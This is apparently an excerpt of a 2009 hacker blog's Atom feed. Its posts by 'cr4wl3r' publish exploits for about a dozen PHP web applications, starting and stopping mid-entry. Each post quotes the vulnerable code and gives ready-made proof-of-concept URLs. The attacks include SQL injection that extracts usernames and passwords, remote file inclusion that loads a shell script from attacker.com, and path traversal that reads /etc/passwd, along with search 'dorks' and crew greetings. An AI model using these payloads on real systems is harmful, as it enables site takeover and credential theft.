2.3.2 SQL Injection Exploit</title><content type='html'>&lt;pre&gt;   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#Download Script      :  http://sourceforge.net/projects/fourtwosevenbb/files/&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#3rr0r: ./fourtwosevenbb-2.3.2/showpost.php&lt;br /&gt;#&lt;br /&gt;#      &lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#PoC  :   http://server/[path]/showpost.php?ForumID=1&amp;amp;post=[SQL]&lt;br /&gt;#         http://server/[path]/showpost.php?ForumID=1&amp;amp;post=1%20union%20select%201,UserName,3,4,5,Password,7%20FROM%20427bb_personal%20WHERE%20ID=1--&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt; [ Gorontalo / 2009 ]&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-1013041026072029149?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/1013041026072029149/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/exploit.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/1013041026072029149'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/1013041026072029149'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/exploit.html' title='427BB Fourtwosevenbb &lt;= 2.3.2 SQL Injection Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-2783110855087017844</id><published>2009-12-05T19:27:00.002-08:00</published><updated>2009-12-05T19:28:17.529-08:00</updated><title type='text'>SAPID SHOP &lt;= 1.3 Remote File Include Vulnerability</title><content type='html'>[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#SAPID SHOP &lt;= 1.3 Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://sourceforge.net/projects/sapid/files&lt;br /&gt;#Dork                 :  die("lamers attempt");  :D&lt;br /&gt;########################################################################&lt;br /&gt;#&lt;br /&gt;#Vuln : ./SAPID-SHOP-1.3/usr/extensions/get_tree.inc.php (line 11)&lt;br /&gt;#&lt;br /&gt;#     &lt;?php&lt;br /&gt;#       if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");&lt;br /&gt;#       include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }&lt;br /&gt;#      ?&gt;&lt;br /&gt;#&lt;br /&gt;#PoC  :  http://0wn3d.com/[path]/usr/extensions/get_tree.inc.php?root_path=http://attacker.com/shell.txt???&lt;br /&gt;#&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;   [ Gorontalo / 2009 ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-2783110855087017844?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/2783110855087017844/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/sapid-shop-13-remote-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/2783110855087017844'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/2783110855087017844'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/sapid-shop-13-remote-file-include.html' title='SAPID SHOP &lt;= 1.3 Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-5741301404854965178</id><published>2009-12-05T19:27:00.001-08:00</published><updated>2009-12-05T19:27:38.082-08:00</updated><title type='text'>Thatware &lt;= 0.5.3 Multiple Remote File Include Exploit</title><content type='html'>&lt;pre&gt;[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#Thatware &lt;= 0.5.3 Multiple Remote File Include Exploit&lt;br /&gt;#Download Script  :  http://sourceforge.net/projects/thatware/files&lt;br /&gt;########################################################################&lt;br /&gt;#&lt;br /&gt;#Vuln : ./thatware_path/config.php (line 4)&lt;br /&gt;#&lt;br /&gt;#      &lt;?php&lt;br /&gt;#        include $root_path."db_settings.php";&lt;br /&gt;#      ?&gt;&lt;br /&gt;#&lt;br /&gt;#PoC  :  http://server/config.php?root_path=http://[attcker]/shell.txt???&lt;br /&gt;#&lt;br /&gt;#Vuln : ./thatware_path/artlist.php (line 28)&lt;br /&gt;#&lt;br /&gt;#      &lt;?php&lt;br /&gt;#        include $root_path.'thatfile.php';&lt;br /&gt;#      ?&gt;&lt;br /&gt;#&lt;br /&gt;#PoC  :  http://server/artlist.php?root_path=http://[attcker]/shell.txt???&lt;br /&gt;#&lt;br /&gt;#Vuln : ./thatware_path/thatfile.php (line 130)&lt;br /&gt;#&lt;br /&gt;#      &lt;?php&lt;br /&gt;#        if(file_exists($root_path.'config.php'))&lt;br /&gt;#      include($root_path.'config.php');&lt;br /&gt;#      ?&gt;&lt;br /&gt;#&lt;br /&gt;#PoC  :  http://server/thatfile.php?root_path=http://[attcker]/shell.txt???&lt;br /&gt;#&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  [ Gorontalo / 2009 ]&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-5741301404854965178?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/5741301404854965178/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/thatware-053-multiple-remote-file.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/5741301404854965178'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/5741301404854965178'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/thatware-053-multiple-remote-file.html' title='Thatware &lt;= 0.5.3 Multiple Remote File Include Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-5190284910979696649</id><published>2009-12-05T19:26:00.002-08:00</published><updated>2009-12-05T19:27:08.891-08:00</updated><title type='text'>Public Media Manager &lt;= 1.3 (forms_dir) Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#Public Media Manager &lt;= 1.3 (forms_dir) Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://sourceforge.net/projects/pmm-cms/files/&lt;br /&gt;#Dork                 :  die("Lamers attempt");  :D&lt;br /&gt;########################################################################&lt;br /&gt;#&lt;br /&gt;#Vuln : ./pmm-cms-1.3/comcal/calmenu.php (line 4)&lt;br /&gt;#       &lt;?php&lt;br /&gt;#          require $forms_dir."calmenuform.php";&lt;br /&gt;#       ?&gt;&lt;br /&gt;#PoC  :  http://server/[path]/comcal/calmenu.php?forms_dir=http://attacker.com/shell.txt?cmd&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;  [ Gorontalo / 2009 ]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-5190284910979696649?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/5190284910979696649/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/public-media-manager-13-formsdir-remote.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/5190284910979696649'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/5190284910979696649'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/public-media-manager-13-formsdir-remote.html' title='Public Media Manager &lt;= 1.3 (forms_dir) Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-4495132192278516803</id><published>2009-12-05T19:26:00.001-08:00</published><updated>2009-12-05T19:26:46.949-08:00</updated><title type='text'>Quate CMS &lt;= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability</title><content type='html'>[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#Quate CMS &lt;= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability&lt;br /&gt;#Download Script      :  http://quate.net/quatecms&lt;br /&gt;#Dork                 :  die("lamers attempt");  :P&lt;br /&gt;########################################################################&lt;br /&gt;#&lt;br /&gt;#Vuln RFI : ./QuateCMS_035/admin/includes/header.php (line 27)&lt;br /&gt;#       &lt;?php&lt;br /&gt;#         if ($bypass_restrict != 1) {&lt;br /&gt;#            require_once($secure_page_path. "includes/secure.php");&lt;br /&gt;#         }&lt;br /&gt;#       ?&gt;&lt;br /&gt;#PoC  :  http://[target]/[path]/admin/includes/header.php?secure_page_path=http://[attacker]/shell.txt???&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#########################################################################&lt;br /&gt;#&lt;br /&gt;#Vuln LFI : ./QuateCMS_035/admin/includes/footer.php (line 4)&lt;br /&gt;#       &lt;?PHP&lt;br /&gt;#           if ($not_logged_in != 1) {&lt;br /&gt;#             if (file_exists("includes/themes/" .$row_secure['account_theme']. "/footer.php")) {&lt;br /&gt;#              require_once("themes/" .$row_secure['account_theme']. "/footer.php");&lt;br /&gt;#        ?&gt;&lt;br /&gt;#PoC   :  http://[target]/[path]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../etc/passwd&lt;br /&gt;#&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;   [ Gorontalo / 2009 ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4495132192278516803?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/4495132192278516803/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/quate-cms-035-rfilfi-multiple-remote.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4495132192278516803'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4495132192278516803'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/quate-cms-035-rfilfi-multiple-remote.html' title='Quate CMS &lt;= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-925397531079439998</id><published>2009-12-05T19:25:00.004-08:00</published><updated>2009-12-05T19:26:19.921-08:00</updated><title type='text'>ISPworker &lt;= 1.23 Remote File Disclosure exploit</title><content type='html'>[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#ISPworker &lt;= 1.23 Remote File Disclosure exploit&lt;br /&gt;#Download Script      :  http://www.ispware.de/_files/ispworker-1.23.tar.gz&lt;br /&gt;#Dork                 :  die("lamers attempt");  :P&lt;br /&gt;########################################################################&lt;br /&gt;#&lt;br /&gt;#Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php&lt;br /&gt;#&lt;br /&gt;#       &lt;?header('Content-type: '.$_REQUEST[type]);&lt;br /&gt;#        header('Content-Disposition: attachment; filename="'.$_REQUEST[filename].'"');&lt;br /&gt;#        readfile("./tmp/$ticketid"."_".$_REQUEST[filename]);&lt;br /&gt;#       ?&gt;&lt;br /&gt;#&lt;br /&gt;#PoC  :  http://[target]/[path]/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd&lt;br /&gt;#        http://[target]/[path]/module/ticket/download.php?filename=../../../../../../../../../etc/passwd&lt;br /&gt;#&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;   [ Gorontalo / 2009 ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-925397531079439998?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/925397531079439998/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/ispworker-123-remote-file-disclosure.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/925397531079439998'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/925397531079439998'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/ispworker-123-remote-file-disclosure.html' title='ISPworker &lt;= 1.23 Remote File Disclosure exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-4653691336195964175</id><published>2009-12-05T19:25:00.003-08:00</published><updated>2009-12-05T19:25:38.894-08:00</updated><title type='text'>Ciamos CMS &lt;= 0.9.5 (module_path) Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#Ciamos CMS &lt;= 0.9.5 (module_path) Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://sourceforge.net/projects/ciamosmodules/files/&lt;br /&gt;#Dork                 :  die("Hacking attempt");  :D&lt;br /&gt;########################################################################&lt;br /&gt;#&lt;br /&gt;#Vuln : ./ciamos/modules/pms/index.php (line 13)&lt;br /&gt;#       &lt;?php&lt;br /&gt;#          include_once($module_path.'include/header.php');&lt;br /&gt;#       ?&gt;&lt;br /&gt;#PoC  :  http://server/modules/pms/index.php?module_path=http://[attacker]/shell.txt???&lt;br /&gt;#&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  [ Gorontalo / 2009 ]&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4653691336195964175?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/4653691336195964175/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/ciamos-cms-095-modulepath-remote-file.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4653691336195964175'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4653691336195964175'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/ciamos-cms-095-modulepath-remote-file.html' title='Ciamos CMS &lt;= 0.9.5 (module_path) Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-9008242424938773012</id><published>2009-12-05T19:25:00.001-08:00</published><updated>2009-12-05T19:25:10.790-08:00</updated><title type='text'>SweetRice &lt;= 0.5.0 Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#SweetRice &lt;= 0.5.0 Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://php.opensourcecms.com/scripts/redirect/download.php?id=353&lt;br /&gt;#Dork                 :  die("lamers attempt");  :P&lt;br /&gt;########################################################################&lt;br /&gt;#&lt;br /&gt;#Vuln : ./sweetrice/_plugin/subscriber/inc/post.php (line 2)&lt;br /&gt;#       &lt;?php&lt;br /&gt;#         include_once($root_dir."_plugin/fckeditor/fckeditor.php") ;&lt;br /&gt;#       ?&gt;&lt;br /&gt;#PoC  :  http://server/_plugin/subscriber/inc/post.php?root_dir=http://[attacker]/shell.txt???&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################&lt;br /&gt;########################################################################&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  [ Gorontalo / 2009&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-9008242424938773012?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/9008242424938773012/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/sweetrice-050-remote-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/9008242424938773012'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/9008242424938773012'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/sweetrice-050-remote-file-include.html' title='SweetRice &lt;= 0.5.0 Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-2918073947613144238</id><published>2009-12-05T19:24:00.001-08:00</published><updated>2009-12-05T19:24:43.368-08:00</updated><title type='text'>phptraverse &lt;= 0.8.0 Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#phptraverse &lt;= 0.8.0 Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://sourceforge.net/projects/phptraverse/files/&lt;br /&gt;#Dork                 :  die("Hacking attempt");  :D&lt;br /&gt;########################################################################&lt;br /&gt;#&lt;br /&gt;#Vuln : ./phptraverse-0.8.0/assets/plugins/mp3_id/mp3_id.php (line 32)&lt;br /&gt;#       &lt;?php&lt;br /&gt;#          include_once $GLOBALS['BASE'].'/PEAR/PEAR.php';&lt;br /&gt;#       ?&gt;&lt;br /&gt;#PoC  :  http://server/[path]/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://attacker.com/shell.txt?cmd&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;########################################################################&lt;br /&gt;#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,&lt;br /&gt;#        dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;/##############################################\&lt;br /&gt;#   all member at  sekuritionline.net          #&lt;br /&gt;#   all member at  manadocoding.net            #&lt;br /&gt;\##############################################/&lt;br /&gt;&lt;br /&gt;  [ Gorontalo / 2009 ]&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-2918073947613144238?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/2918073947613144238/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/phptraverse-080-remote-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/2918073947613144238'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/2918073947613144238'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/phptraverse-080-remote-file-include.html' title='phptraverse &lt;= 0.8.0 Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-8378965717591973390</id><published>2009-12-05T19:23:00.002-08:00</published><updated>2009-12-05T19:24:00.668-08:00</updated><title type='text'>OPT (Outreach Project Tool) &lt;= 1.2.6 [CRM_path] Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;   [ Discovered by cr4wl3r \ Indonesian Hacker ]&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;# OPT (Outreach Project Tool) &lt;= 1.2.6 [CRM_path] Remote File Include Vulnerability&lt;br /&gt;# Download Script      :  http://sourceforge.net/projects/outreach&lt;br /&gt;# Dork                 :  "Adhan Handsome"  :D&lt;br /&gt;########################################################################&lt;br /&gt;#&lt;br /&gt;# Vuln : ./OPT_1-2-7_MAX/opt/forums/Forum_Include/index.php (line 10)&lt;br /&gt;#       &lt;?php&lt;br /&gt;#          include "$CRM_path/forums/Forum_Include/forum_admin.inc";&lt;br /&gt;#       ?&gt;&lt;br /&gt;# PoC  :  http://server/[path]/forums/Forum_Include/index.php?CRM_path=http://[attacker]/shell.txt???&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;########################################################################&lt;br /&gt;# Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,&lt;br /&gt;#         dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;/##############################################\&lt;br /&gt;#   all member at  sekuritionline.net          #&lt;br /&gt;#   all member at  manadocoding.net            #&lt;br /&gt;\##############################################/&lt;br /&gt;&lt;br /&gt;# Contact Me : cr4wl3r[4t]linuxmail[dot]org&lt;br /&gt;&lt;br /&gt;  [ Gorontalo / 2009 ]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8378965717591973390?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/8378965717591973390/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/opt-outreach-project-tool-126-crmpath.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8378965717591973390'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8378965717591973390'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/opt-outreach-project-tool-126-crmpath.html' title='OPT (Outreach Project Tool) &lt;= 1.2.6 [CRM_path] Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-4406853742698026097</id><published>2009-12-05T19:23:00.001-08:00</published><updated>2009-12-05T19:23:35.000-08:00</updated><title type='text'>NukeHall &lt;= 0.3 Multiple Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#NukeHall &lt;= 0.3 Multiple Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://sourceforge.net/project/NukeHall/files/&lt;br /&gt;#Dork                 :  die("Hacking attempt");  :D&lt;br /&gt;########################################################################&lt;br /&gt;#&lt;br /&gt;#Vuln : ./nukehall_0.3/admin/modules/blocks.php (line 28)&lt;br /&gt;#       &lt;?php&lt;br /&gt;#          include $spaw_root.'spaw_control.class.php';&lt;br /&gt;#       ?&gt;&lt;br /&gt;#PoC  :  http://server/[path]/admin/modules/blocks.php?spaw_root=http://attacker.com/shell.txt?cmd&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#Vuln : ./nukehall_0.3/admin/modules/messages.php (line 28)&lt;br /&gt;#       &lt;?php&lt;br /&gt;#          include $spaw_root.'spaw_control.class.php';&lt;br /&gt;#       ?&gt;&lt;br /&gt;#PoC  :  http://server/[path]/admin/modules/messages.php?spaw_root=http://attacker.com/shell.txt?cmd&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#Vuln : ./nukehall_0.3/admin/modules/stories.php (line 28)&lt;br /&gt;#       &lt;?php&lt;br /&gt;#          include $spaw_root.'spaw_control.class.php';&lt;br /&gt;#       ?&gt;&lt;br /&gt;#PoC  :  http://server/[path]/admin/modules/stories.php?spaw_root=http://attacker.com/shell.txt?cmd&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;########################################################################&lt;br /&gt;#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,&lt;br /&gt;#        dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*&lt;br 